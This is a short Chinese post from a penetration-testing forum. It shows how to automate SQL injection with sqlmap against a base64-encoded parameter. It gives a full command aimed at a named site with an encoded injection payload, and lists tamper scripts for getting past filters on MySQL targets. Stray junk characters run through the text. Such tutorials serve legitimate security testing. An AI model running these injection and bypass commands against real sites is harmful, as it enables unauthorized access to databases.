| WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?) c+ j" m, ]3 b% w5 N sqlmap的tamper里有个base64encode.py ) h% v1 }+ w" ^/ J6 M, o 使用如下& E* K4 w. o$ f4 R! m, \+ p: C* H 5 }- S8 `4 V1 ]/ K0 A sqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs6 I: Z( o- G0 a1 m e3 ]; a# x9 T& I$ c " t+ o8 [: p3 v8 ` sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称” 7 _1 J @* ]9 P6 Q 其中常用到的bypass脚本绕过SQLMAP主要两个脚本:! b0 n+ N9 C/ E+ `5 D* R ' [& z/ f0 m9 w. o space2hash.py ,对于MYSQL数据库 4.0, 5.0注入 space2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入' d& i O o# v2 j( L 首先确定目标数据库版本,然后选择相应的脚本。 -v 3 --batch --tamper "space2hash.py" 还有其他一些插件: encodes编码 ——charencode.py" T0 {! v( ^; c base64编码 —— base64encode.py3 f& E: Z5 p; t4 ?9 M0 h 替换空格和关键字 —— halfversionedmorekeywords.py; @3 h7 J. t6 A |
| 欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) | Powered by Discuz! X3.2 |